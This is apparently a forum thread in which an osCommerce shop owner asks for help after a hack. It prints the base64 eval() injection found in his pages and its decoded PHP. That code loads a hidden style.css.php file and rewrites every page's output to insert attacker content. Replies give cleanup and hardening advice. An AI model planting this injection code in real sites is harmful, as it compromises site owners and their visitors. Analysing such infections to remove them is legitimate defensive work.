I have been Hacked! Help Please!

[Guest]

I have this code at the top of all my pages:

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ

2ljY2hhaS9odG1sL2NhdGFsb2cveW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV

9tY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHA

nKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ2ljY2hhaS9odG1sL2NhdGFsb2cv

eW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pbmxpbmVwb

3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdH

MoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemR

lY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDsk

ZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZ

Tt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZC

xjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWY

oJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0Nv

bnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9ke

S9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbW

woKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

 

1) What is it?

2) How was someone able to do that?

3) How can I deleted all at once without having to delete it from each file?

4) How can I prevent this for happening again?

 

Thank you for your help!

 

Ricardo

[♥FWR Media]

What is it? it's nasty that's what .. the actual code is below: -

 

if ( function_exists('ob_start')&&!isset($GLOBALS['sh_no']) ){
 $GLOBALS['sh_no'] = 1;
 if( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ){
include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
if( function_exists('gml') && !function_exists('dgobh') ){
  if( !function_exists('gzdecode')){
	function gzdecode($d){
	  $f=ord(substr($d,3,1));
	  $h=10;$e=0;
	  if($f&4){
		$e=unpack('v',substr($d,10,2));
		$e=$e[1];$h+=2+$e;
	  }
	  if($f&8){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&16){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&2){
		$h+=2;
	  }
	  $u = gzinflate(substr($d,$h));
	  if($u===FALSE){
		$u=$d;
	  }
	  return $u;
	}
  }
  function dgobh($b){
	Header('Content-Encoding: none');
	$c=gzdecode($b);
	if(preg_match('/\<body/si',$c)){
	  return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
	} else {
	  return gml().$c;
	}
  }
  ob_start('dgobh');
}
 }
}

[Guest]

What is it? it's nasty that's what .. the actual code is below: -

 

if ( function_exists('ob_start')&&!isset($GLOBALS['sh_no']) ){
 $GLOBALS['sh_no'] = 1;
 if( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ){
include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
if( function_exists('gml') && !function_exists('dgobh') ){
  if( !function_exists('gzdecode')){
	function gzdecode($d){
	  $f=ord(substr($d,3,1));
	  $h=10;$e=0;
	  if($f&4){
		$e=unpack('v',substr($d,10,2));
		$e=$e[1];$h+=2+$e;
	  }
	  if($f&8){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&16){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&2){
		$h+=2;
	  }
	  $u = gzinflate(substr($d,$h));
	  if($u===FALSE){
		$u=$d;
	  }
	  return $u;
	}
  }
  function dgobh($b){
	Header('Content-Encoding: none');
	$c=gzdecode($b);
	if(preg_match('/\<body/si',$c)){
	  return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
	} else {
	  return gml().$c;
	}
  }
  ob_start('dgobh');
}
 }
}

Robert thanks for your reply. Coul you tell me what to do now? Should I remove the inline popups file from the admin dir ? and then change my ftp password? any other suggestio will be greatly appreciated

[RhinoFish]

see here for things to do when you're been hacked:

http://www.oscommerce.com/forums/index.php?showtopic=313323

[RhinoFish]

some more here, but more about back end database security:

http://www.oscommerce.com/forums/index.php?showtopic=310524

[Guest]

I need to know how to clean that F#$@$ code out of all my files? Is there a way to do it at once or do I have to go one by one and delete the code?

 

Should I installed Security Pro afterwards or before I start deleting the code just in case if it comes back again?

 

How was this hacker able to add that code to all my files?

[♥geoffreywalton]

See the reasons in the links above for the most likely ways in.

 

Set right the permissions on files and directories.

 

Restore the site from a clean backup is the best solution or edit every file and remove the offending code

[diy]

Usually people say that you have to install a clean backup (of the files) and because chances are that the hacker will come back you have to secure the site -afterwards!!

[Guest]

Ok guys thank you for your help. I will upload the clean files from my back up and then add the Security Pro contribution as well as any other mentioned above.

 

Again Thanks!

[Guest]

this infection does the following:

- adds a gifimg.php (or similarly named file) to most/all of your image directories

- adds a javascript function to many index.htm or index.html files on your site

- adds a javascript function to many .js files on your site.

 

FYI.

 

-jared